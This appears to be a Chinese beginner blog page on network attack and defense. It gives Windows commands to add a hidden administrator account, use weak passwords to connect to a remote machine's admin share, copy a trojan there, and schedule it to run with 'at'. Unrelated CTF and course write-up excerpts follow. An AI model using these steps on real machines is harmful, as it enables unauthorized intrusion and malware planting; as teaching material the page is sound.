网络攻防初步

网络查看最常见的命令: ping

net

netstat

tracret

telnet

ftp

ping命令主要就是用来查看网络地址和主机信息,当然有的时候也可以作为一种攻击手段

netstat用来查看主机开启的服务以及端口号

tracret:查看访问一个web地址所经过的路由,可以用来排除故障

telnet和ftp:当然是主要用来远程操作的。

先学习一下插入用户,并升级为超级管理员

主要用到的net user命令结合的。

首先;给计算机价加入一个普通的用户,net user 用户名 密码 /add

然后,升级为超级管理员: net localgroup administrators xuning /add

这样,就完成了在win系统上面添加一个一个超级管理员

利用x-scan扫描弱口令并进行挂马(安全问题,以普通txt为例)

net use \\远程ip\ipc$/user:用户名 密码

复制文件上传:copy 文件 \\目标主机\c$\Winnt

这个时候,就实现了把文件挂在别人的主机

然后如果是木马程序的话还要让他们定时运行:

net time \\目标主机\\

获得时间

运行程序: at \\主机 时间 文件以及路径

时间: 2024-11-03 06:11:36

网络攻防初步的相关文章

信息安全技术 实验五 网络攻防技术 20155202 张旭

信息安全技术 实验五 网络攻防技术 20155202 练习一 信息收集 一. 实验目的 该实验为验证性实验. ? 了解信息搜集的一般步骤 ? 学会熟练使用ping命令 ? 学会利用Nmap等工具进行信息搜集 二. 实验内容 Ping探测 Nmap扫描 探测总结 注:详细实验操作请参考实验室服务器上的参考资料. 三. 实验步骤 本练习主机A.B为一组,C.D为一组,E.F为一组.实验角色说明如下: 实验主机 实验角色 系统环境 A.C.E 扫描源/目标 Windows B.D.F 扫描源/目标 L

《网络攻防相关》

<网络攻防相关> 程序 = 指令 + 数据 对于程序怎么理解成"指令+数据",从汇编语言的层面看最为清晰.一个程序被编译为汇编语言后,很明显的看出实际上就是一行行的汇编代码,而这一行行的汇编代码有相同的格式,都是一个指令,后面接上要操作的数据或者寄存器,而寄存器只是为数据提供一种存储方式,所谓操作寄存器实际是操作寄存器中的数据. XOR AX, AX XOR BX, BX XOR DX, DX MOV CX, 10 MOV SI,OFFSET ARRAX 因此 程序= 指令

2012年第三届西安电子科技大学网络攻防 大赛暨网络渗透部分通关方案 V2.0

2012年第三届西安电子科技大学网络攻防 大赛暨网络渗透部分通关方案 V2.0 南国利剑 Cyberpolice http://weibo.com/nanguojian 前 言: 本次比赛由西电信息安全协会 主办官方站点:https://csc.xdsec.org 10.1-10.15日.注册时间截止于10月10日.请参赛队伍合理分配时间. --XDSEC 0X000 第一关:本地关闭javascript查看网页源码,箭头所指部分为加密部分为十六进制加密 解密得Key:f1rsTPa5skey

南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup

南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup 题目描述 文件下载地址 很明显,文件之间进行亦或就可得到flag,不再多说,直接上脚本 1 #coding:utf-8 2 file_a = open('密文.txt', 'rb') 3 file_b = open('明文.txt', 'rb') 4 ? 5 str_a = ''.join(file_a.readlines()) 6 str_b = ''.join(file_b.readlines()) 7 ? 8 ans =

《网络攻防》第九周学习总结

Nmap使用实践 我们使用kali1.08攻击机对Linux靶机222.28.136.226进行nmap的相关实践,扫描其他靶机类似. 1.测试是否在线 2.查看靶机开放了哪些TCP和UDP端口及安装了什么网络服务: 3.查看靶机的操作系统版本 nmap使用方法总结: 通过主机探测,确定测试目标地址后,往往需要对主机信息做更完善的扫描.nmap可以完成以下任务:主机探测.端口扫描.版本检测.系统检测.支持探测脚本的编写.实际应用场合:通过对设备或者防火墙的探测来审计他的安全性:探测目标主机所开放

工业无线网络标准初步了解

WIA-PA 其全称是<Wireless Networks for Industrial Automation Process Automation>,译为<面向工业过程自动化的工业无线网络标准技术> 国产标准,中科院沈阳自动化研究所提出的标准. 基于IEEE 802.15.4,事实上是在TI cc2430基础上进行了一些简单的网络约定. WirelessHART 基于IEEE 802.15.4. 它的命名来自于HART (Highway Addressable Remote Tr

南京邮电大学网络攻防平台(NCTF)-MD5-Writeup

南京邮电大学网络攻防平台-MD5-Writeup 题干如下: 分析: 遍历 TASC?O3RJMV?WDJKX?ZM(?替换为其他),找到md5为e9032???da???08????911513?0???a2形式的即可 脚本如下: 1 import md5 2 import string 3 ? 4 dic = string.ascii_letters + string.digits 5 ? 6 for i in dic: 7 for j in dic: 8 for k in dic: 9 s

《网络攻防》第七周学习总结

Kali教材学习 本周主要学习了<网络攻防---技术与实践>第7章的内容,主要学习了 Windows操作系统安全攻防         Windows操作系统基本框架 如上图所示,Windows操作系统分为运行于处理器特权模式(ring 0)的操作系统内核,以及运行在处理器非特权模式(ring 3)的用户空间代码.采用宏内核(monolithic)模式进行架构.内核基本模块分为:Windows执行体 .Windows内核体 .设备驱动程序 .硬件抽象层 .Windows窗口与图形界面内核实现代码

《网络攻防》第五周学习总结

教材内容学习 web应用程序体系结构及其安全威胁 web应用体系结构 浏览器 web服务器 web应用程序 数据库 传输协议http/https web应用安全威胁 针对浏览器和终端用户的web浏览安全威胁 针对传输网络的网络协议安全威胁 系统层安全威胁 web服务器软件安全威胁 web应用程序安全威胁 web数据安全威胁 web应用安全攻防技术概述 web应用的信息收集 对目标web应用服务进行发现与剖析,标识出它的基本轮廓,具体包括服务器域名,IP地址和虚拟IP地址,web服务器端口与其他开